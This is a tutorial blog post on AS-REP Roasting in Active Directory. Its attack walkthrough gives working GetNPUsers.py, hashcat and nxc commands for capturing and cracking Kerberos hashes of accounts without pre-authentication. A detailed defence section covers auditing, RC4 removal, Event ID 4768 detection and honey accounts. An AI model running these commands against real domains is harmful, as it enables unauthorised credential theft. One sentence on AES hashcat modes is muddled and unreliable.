AS-REP Roasting: Abusing Accounts Without Kerberos Pre-Authentication

Active Directory
2026.06.09
Time it takes to read this article 5 minutes.

Disclaimer: This article is for educational purposes and authorized security testing only. Run these techniques exclusively against systems you own or have explicit written permission to test. Unauthorized access to computer systems is illegal in most jurisdictions and can carry severe penalties.

Introduction

AS-REP Roasting is one of the most reliable ways to obtain crackable credential material in an Active Directory environment, often without any valid domain account. The attack targets users whose Kerberos pre-authentication has been disabled. When that single flag is set, the Key Distribution Center (KDC) will return an encrypted blob — derived from the user's password — to anyone who simply asks for it.

In this article you will learn how Kerberos pre-authentication works, why disabling it is dangerous, how to enumerate and roast vulnerable accounts with GetNPUsers.py, how to crack the resulting hashes with hashcat mode 18200, and — just as importantly — how a defender detects and prevents the attack. If you understand Kerberoasting, this technique will feel familiar but is distinct: AS-REP Roasting attacks the AS-REQ/AS-REP exchange, not the service-ticket (TGS) exchange.

How It Works

In the standard Kerberos flow, a client requesting a Ticket Granting Ticket (TGT) must prove it knows the user's password before the KDC issues anything. This proof is called pre-authentication: the client encrypts a timestamp with a key derived from the user's password and sends it in the AS-REQ. The KDC decrypts it and, only if the timestamp is valid, replies with an AS-REP containing the encrypted session key material.

When the account attribute DONT_REQ_PREAUTH (bit 0x400000 in userAccountControl) is set, the KDC skips this check. An attacker can send an AS-REQ for that username and the KDC will happily return an AS-REP. Part of that AS-REP — the encrypted portion containing the session key — is encrypted with a key derived from the user's password. That encrypted blob can be extracted and brute-forced offline. No valid credentials are required to request it; you only need to know (or guess) the username and reach the KDC on port 88.

Why would DONT_REQ_PREAUTH ever be set? Legacy applications, certain UNIX/Linux Kerberos integrations, and misconfigured service accounts sometimes require it. Each such account is a standing offline-cracking target.

Prerequisites / Lab Setup

To reproduce this in a lab you need:

  • A Windows Server Domain Controller (e.g., dc01.lab.local).
  • A user account with pre-authentication disabled.
  • An attacker host with Impacket and hashcat installed.

Create a vulnerable account in the lab with PowerShell on the DC:

New-ADUser -Name "svc-legacy" -SamAccountName "svc-legacy" `
  -AccountPassword (ConvertTo-SecureString "Summer2026!" -AsPlainText -Force) `
  -Enabled $true

# Disable Kerberos pre-authentication
Set-ADAccountControl -Identity "svc-legacy" -DoesNotRequirePreAuth $true

You can confirm the flag from any domain-joined host:

Get-ADUser -Filter 'useraccountcontrol -band 4194304' -Properties useraccountcontrol |
  Select-Object SamAccountName, useraccountcontrol

The value 4194304 is decimal for 0x400000, the DONT_REQ_PREAUTH bit.

Attack Walkthrough

Step 1 — Enumerate vulnerable accounts

If you already have any valid domain credentials, you can ask LDAP for every account with the flag set using Impacket's GetNPUsers.py:

GetNPUsers.py lab.local/lowpriv:'Password123!' -dc-ip 10.10.10.10 -request -format hashcat -outputfile asrep.hashes

The -request flag tells the tool to actually request and dump the AS-REP for every vulnerable account it finds.

Step 2 — Roast without credentials

The more dangerous scenario: you have no credentials at all, only a list of candidate usernames (from OSINT, a previous breach, or naming-convention guessing). Supply that list with -usersfile:

GetNPUsers.py lab.local/ -dc-ip 10.10.10.10 -no-pass -usersfile users.txt -format hashcat -outputfile asrep.hashes

Note the trailing slash after lab.local/ (empty username) and -no-pass. For each user that has pre-auth disabled, the KDC returns an AS-REP and Impacket writes a hash. Users that require pre-auth simply produce a KDC_ERR_PREAUTH_REQUIRED and are skipped.

A captured hash looks like this (hashcat format):

$krb5asrep$23$svc-legacy@LAB.LOCAL:a1b2c3...d4e5f6$9f8e7d...

The 23 indicates RC4-HMAC (etype 23) encryption — by far the easiest to crack and what most tools default to.

Step 3 — Crack offline with hashcat

Feed the hashes to hashcat using mode 18200 (Kerberos 5 AS-REP etype 23):

hashcat -m 18200 asrep.hashes /usr/share/wordlists/rockyou.txt -r rules/best64.rule

To verify success and display the cracked passwords:

hashcat -m 18200 asrep.hashes --show

John the Ripper works equally well; Impacket's default format is already John-compatible, and the -format hashcat switch produces the variant shown above for mode 18200.

Step 4 — Use the credentials

Once cracked, validate the password and pivot:

nxc smb 10.10.10.10 -u svc-legacy -p 'Summer2026!'

From here you can enumerate shares, run BloodHound collection, or hunt for further escalation paths.

Attack Flow Diagram

AS-REP Roasting: Abusing Accounts Without Kerberos Pre-Authentication diagram 1

Text fallback: the attacker sends an AS-REQ without proof, the KDC returns an AS-REP because pre-auth is disabled, and the attacker cracks the password-derived blob offline with hashcat mode 18200.

Detection & Defense (Blue Team)

AS-REP Roasting is cheap to detect and even cheaper to eliminate at the root.

1. Eliminate the misconfiguration. The single most effective control is to ensure no account has DONT_REQ_PREAUTH set unless absolutely required. Audit regularly:

Get-ADUser -Filter 'useraccountcontrol -band 4194304' -Properties useraccountcontrol |
  Select-Object SamAccountName, DistinguishedName

Remediate any unexpected results:

Set-ADAccountControl -Identity "svc-legacy" -DoesNotRequirePreAuth $false

2. Strengthen passwords on accounts that genuinely need it. If a legacy app truly requires pre-auth disabled, give the account a long, random (25+ character) password. Offline cracking only works against weak passwords, so a strong one makes the captured hash effectively useless. Where possible, switch the account to use a Group Managed Service Account (gMSA).

3. Disable RC4. Mode 18200 cracks etype 23 (RC4) fastest. Enforcing AES-only Kerberos (etypes 17/18) raises the cracking cost substantially. Configure the "Network security: Configure encryption types allowed for Kerberos" Group Policy (registry: HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Kerberos\Parameters\SupportedEncryptionTypes) to drop RC4. Note that AES AS-REP hashes correspond to hashcat mode 18200 for etype 23, and 19600/19700/19800/19900 ranges for TGS — AES AS-REP itself is still crackable but slower; the strong-password control matters most.

4. Monitor Windows event logs. Watch for Event ID 4768 (A Kerberos authentication ticket (TGT) was requested) where the Pre-Authentication Type = 0. A TGT issued with pre-auth type 0 is the on-the-wire signature of AS-REP Roasting. A burst of these across many usernames from a single source is a strong indicator of mass roasting.

Event ID: 4768
Pre-Authentication Type: 0
Ticket Encryption Type: 0x17  (RC4 — additionally suspicious)

5. Alert in your SIEM. A representative detection logic: trigger when 4768 events with Pre-Authentication Type == 0 occur, especially in volume or against accounts that should never authenticate that way. This maps to MITRE ATT&CK T1558.004 (Steal or Forge Kerberos Tickets: AS-REP Roasting).

6. Honey accounts. Create a decoy user with pre-auth disabled and a strong password, then alert on any 4768/pre-auth-type-0 event referencing it. Legitimate traffic should never touch it, so any hit is high-fidelity. See our notes on Kerberos honey-token detection.

Conclusion

AS-REP Roasting turns a single misconfigured account attribute into a credential-disclosure primitive that often requires no authentication to exploit. The attack chain is short: enumerate accounts with DONT_REQ_PREAUTH, request their AS-REP with GetNPUsers.py, and crack the password-derived blob offline using hashcat mode 18200. For defenders the lesson is equally simple — audit for the flag, enforce strong passwords and AES on any account that genuinely needs it, and alert on Event ID 4768 with pre-authentication type 0. For deeper coverage of the related TGS-based attack, see Kerberoasting.

References

Comments

Copied title and URL